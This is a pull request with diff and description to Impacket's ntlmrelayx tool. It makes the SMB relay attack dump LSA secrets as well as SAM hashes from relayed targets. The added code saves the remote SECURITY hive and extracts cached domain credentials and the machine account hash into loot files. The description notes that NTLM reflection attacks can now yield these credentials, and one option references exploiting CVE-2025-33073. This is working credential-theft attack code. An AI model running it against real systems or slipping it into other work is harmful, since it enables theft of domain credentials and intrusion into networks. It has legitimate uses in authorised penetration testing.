### PR TITLE
Add LSA dump to ntlmrelayx SMB attack

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -325,7 +325,7 @@ if __name__ == '__main__':
     parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection')
     parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
     parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot '
-                    'directory in which gathered loot such as SAM dumps will be stored (default: current directory).')
+                    'directory in which gathered loot such as SAM and LSA dumps will be stored (default: current directory).')
     parser.add_argument('-of','--output-file', action='store',help='base output filename for encrypted hashes. Suffixes '
                                                                    'will be added for ntlm and ntlmv2')
     parser.add_argument('-dh','--dump-hashes', action='store_true', default=False, help='show encrypted hashes in the console')
@@ -351,7 +351,7 @@ if __name__ == '__main__':
     parser.add_argument('--remove-sign-seal', action='store_true', help='Remove SIGN/SEAL-related NTLM negotiate flags (exploit CVE-2025-33073)')
     parser.add_argument('--serve-image', action='store',help='local path of the image that will we returned to clients')
     parser.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '
-                        'target system (for SMB and RPC). If not specified for SMB, hashes will be dumped (secretsdump.py must be'
+                        'target system (for SMB and RPC). If not specified for SMB, SAM hashes and LSA secrets will be dumped (secretsdump.py must be'
                         ' in the same directory). For RPC no output will be provided.')
     parser.add_argument('--mssql-db', action='store', required = False, help='Database for MSSQL relay')
 
@@ -359,7 +359,7 @@ if __name__ == '__main__':
     smboptions = parser.add_argument_group("SMB client options")
 
     smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. '
-                                     'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
+                                     'If not specified, SAM hashes and LSA secrets will be dumped (secretsdump.py must be in the same directory)')
     smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)')
     smboptions.add_argument('--rpc-attack', action='store', choices=[None, "TSCH", "ICPR"], required=False, default=None, help='Select the attack to perform over RPC over named pipes.')
     

--- a/impacket/examples/ntlmrelayx/attacks/smbattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/smbattack.py
@@ -36,8 +36,8 @@ PROTOCOL_ATTACK_CLASS = "SMBAttack"
 class SMBAttack(ProtocolAttack):
     """
     This is the SMB default attack class.
-    It will either dump the hashes from the remote target, or open an interactive
-    shell if the -i option is specified.
+    It will either dump the SAM hashes and LSA secrets from the remote target,
+    or open an interactive shell if the -i option is specified.
     """
     PLUGIN_NAMES = ["SMB"]
     def __init__(self, config, SMBClient, username, target=None, relay_client=None):
@@ -157,9 +157,11 @@ class SMBAttack(ProtocolAttack):
                     LOG.error(str(e))
 
             else:
-                from impacket.examples.secretsdump import RemoteOperations, SAMHashes
+                from impacket.examples.secretsdump import RemoteOperations, SAMHashes, LSASecrets
                 from impacket.examples.ntlmrelayx.utils.enum import EnumLocalAdmins
+                import os
                 samHashes = None
+                lsaSecrets = None
                 try:
                     # We have to add some flags just in case the original client did not
                     # Why? needed for avoiding INVALID_PARAMETER
@@ -197,16 +199,34 @@ class SMBAttack(ProtocolAttack):
                     else:
                         bootKey = remoteOps.getBootKey()
                         remoteOps._RemoteOperations__serviceDeleted = True
+
+                        sam_filename = os.path.join(self.config.lootdir, self.__SMBConnection.getRemoteHost() + '_samhashes') if self.config.lootdir else self.__SMBConnection.getRemoteHost() + '_samhashes'
+                        cached_filename = os.path.join(self.config.lootdir, self.__SMBConnection.getRemoteHost() + '_cachedhashes') if self.config.lootdir else self.__SMBConnection.getRemoteHost() + '_cachedhashes'
+                        lsa_filename = os.path.join(self.config.lootdir, self.__SMBConnection.getRemoteHost() + '_lsasecrets') if self.config.lootdir else self.__SMBConnection.getRemoteHost() + '_lsasecrets'
+
                         samFileName = remoteOps.saveSAM()
                         samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
                         samHashes.dump()
-                        samHashes.export(self.__SMBConnection.getRemoteHost()+'_samhashes')
+                        samHashes.export(sam_filename)
                         LOG.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
+
+                        try:
+                            securityFileName = remoteOps.saveSECURITY()
+                            lsaSecrets = LSASecrets(securityFileName, bootKey, remoteOps, isRemote = True)
+                            lsaSecrets.dumpCachedHashes()
+                            lsaSecrets.exportCached(cached_filename)
+                            lsaSecrets.dumpSecrets()
+                            lsaSecrets.exportSecrets(lsa_filename)
+                            LOG.info("Done dumping LSA secrets for host: %s", self.__SMBConnection.getRemoteHost())
+                        except Exception as e:
+                            LOG.error("Failed to dump LSA secrets: %s", str(e))
                 except Exception as e:
                     LOG.error(str(e))
                 finally:
                     if samHashes is not None:
                         samHashes.finish()
+                    if lsaSecrets is not None:
+                        lsaSecrets.finish()
                     if remoteOps is not None:
                         remoteOps.finish()
                 


### PR DESCRIPTION
Self explanatory title. For some reason, ntlmrelayx SMB attack only dumps SAM so I added LSA. Code is basically copy-paste for how secretsdump works. This means that NTLM reflection attacks over SMB can now get you cached domain credentials and the machine account hash.